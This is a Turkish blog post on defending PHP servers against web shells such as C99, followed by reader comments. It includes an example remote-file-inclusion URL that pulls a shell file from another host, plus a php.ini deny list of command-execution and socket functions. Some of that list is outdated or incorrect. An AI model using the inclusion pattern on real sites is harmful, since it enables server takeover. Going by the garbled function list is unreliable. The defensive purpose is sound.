Shell Korunması

Merhabalar, uzun zamandan gelen bir şey olan SHELL ile hack yönteminden korunmanın yolları bazı işlemlerden geçiyor.

1) SHELL NEDİR?

PHP’ nin en büyük sorunlarından biridir. Dosyanın nereden geldiği ya da nasıl geldiği önemli değil önemli olan o dosyanın sunucuda olup olmamasıdır varsa PHP çalıştırma işlemlerini yapacaktır. Kodların işlenmesi ile geçmiş olsun sizde HACKLENDİNİZ! Onun için varsa sunucu şirketiniz ile irtibata geçip birazdan anlatacağım korunma yollarını talep ediniz eğer sunucu sizinse ve “root” yetkilisi sizseniz gerekli savunmayı kendiniz kolaylıkla yapabilirsiniz.

Başlıca SHELL tipleri, C99, R57, C100,   ASPXspy2… devam eder.Bir kaç örnek vermek gerekirse

cLowN adında bir hacker tarafından Kanal 3 hacklenmişti. Burada yaptığı şey yine basit bir shell ile saldırmak olmuştu.

Aynı zaman da bir çok hack timine bağlı insanlar bunu yapmaktadır. Ayyıldız Tim, TurkHackTeam, Cyber-Warrior[Akıncılar]…

Kısaca özetlemek gerekirsek SHELL sistem de sizi temel yetkilerle yetkilendirir.(Okuma, Yazma, Silme…)

2)SHELL NASIL KULLANILIR?

Bunun bir çok farklı kullanımı bulunmaktadır.Özellikle programcılığın arttığı bu yıllar da bir çok farklı yöntem geliştirildi.Başlıca kullanımlar;

http://www.siteadi.com/index.php?denetim=Http://siteniz.com/c99.txt?

Bu örnekte index.php’ye c99.txt adlı metni siteden çek bu sayede sitenize c99.txt dosyası upload edildi.PHP değil çalışmaz ki düşüncesine sahip tanıdıklarım olduğu için belirtiyorum. YOK ÖYLE BİR DÜNYA ne yazık ki sistem bu dosyada ki kodları da işliyor.Bazen de upload açıkları oluyor örnek vermek gerekirse bir siteye girdiniz eğer dosyaları kontrol etmeden direk sunucuya taşıyorsa vay haline en fazla bir kaç saat ömrü var demektir.PHP dosyaları her ne olursa olsun sunucuda direkt olarak çalıştırılır.

Sisteme girdikten sonra çıkan ekran;

Shell bir baş belası kodlamadır!

Shell bir baş belası kodlamadır!

 

Bu gördüğünüz bir C99 örneğidir.Sisteme girdikten sonra yalnızca hacker’ın size yapıcağı şovları izlemek ile yetinirsiniz.

3)Korunma Yolları

İşte şimdi işin en güzel “Gardaş biz bu adamları durduramayız mı?” sorusunun cevaı elbette durdurulur.Zekice planlanmış bir savunma duvarı ile kendinizi en azından “lamer” tabirini kullandığımız 10-16 yaş grubu çocukları sitenizden uzak tutar.Gelelim korumaya;

Sunucuya “ROOT” olarak giriş yapın.(Giriş yapmak için genel de putty kullanılır.)

php.ini dosyasını düzenlemek için picovi – ya da nano editörlerinden birini kullanabilirsiniz.Ben pico’yu tercih ediyorum.

pico /etc/php.ini

yada php ayar dosyasını komutuyla açıyoruz…

Safe Mod ‘ Off ise Off u Silerek On Yapıyoruz ...
Safe-mode: ON
(secure)

Open Basedir karşısına yazıyoruz .

Open base dir: /home/yer6tr:/usr/lib/php:/usr/local/lib/php:/tmp

Disable functions : Satırına yapıştırın bunları ..

Disable functions : foreach,glob,hopenbasedir,f_open,system,dl,passthru,cat,exec,
popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,
show_source,posix_mkfifo,mysql_list_dbs,get_current_user,getmyuid,pconnect,link,symlink,
pcntl_exec,ini_alter,parse_ini_file,leak,apache_child_terminate,posix_kill,
posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,fpassthru,stream_select,
socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,
socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,
pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_modules,apache_get_version,apache_getenv,
apache_note,apache_setenv,virtual,user_dir

ctrl+x yazın y tıklayıp enterlayın ardından service htttpd restart yapıyoruz.

Suse ise
service apache2 restart yapıyoruz.

Bu korumalardan sonra shell yalnızca CHMOD 777 yetkisine sahip olan klasörlere atılabilir halde olucaktır.vBulletin vb. Forum yazılımı kullanıyorsanız.Configleri criptolayınız.

4)Sonuç

Konumuzun sonuna geldik nihayet savunmalarımızı yaptık shell nedir öğrendik aklınıza takılan soruları mesaj yoluyla sorabilirsiniz.Savunma geliştirilebilir aklınız da daha iyi fikirler varsa bize sunmanız yeterli olucaktır.Esen kalın…

Lamerlara karşı direnişte başarılar…

5.00 avg. rating (96% score) - 1 vote
Kategori: Server, Webmaster
Etiketler: / / /

Hakkında

Eren Küçük2002'den beri bilgisayar dünyası ile içli dışlıyım.Birçok kez site açtım bir kaç defa farklı online oyunlar kurdum.En çok ilgimi çeken şey PHP oldu.Son 3 senedir salt olarak PHP ile uğraşmaktayım.

Yazıya Yapılan Yorumlar

  1. Avatar Mustafa dedi ki:

    Disable functions ile diger bazi onemli fonksiyonlari iptal etmeniz neden?
    ki siz hosting saglayici iseniz bunu yapamazsiniz. Belki musterilerinizden birisi bu functionlari kullanmak isteyecek?

  2. Avatar hakan dedi ki:

    Aşağıda bahsettiğiniz kodlarda yer6tr nedir? isminde tr olması bana başkasına özel olduğunu düşündürdü. Bu sizin yolunuz mu? Peki biz kendi yolumuzu mu yazacağız? Biraz daha açıklar mısınız.

    Open base dir: /home/yer6tr:/usr/lib/php:/usr/local/lib/php:/tmp

  3. mimforeva mimforeva dedi ki:

    Paylasim icin tesekkurler Eren.. Shellerden korunma cesitleri icinde kaynagi bilinmeyen hazir script ve kodlardan uzak durmakta buyuk fayda saglayabilir. Sifrelenmis php dosyalari icinde sitenizin savunmasi tam bir bilinmezdedir..

Yorum Yazın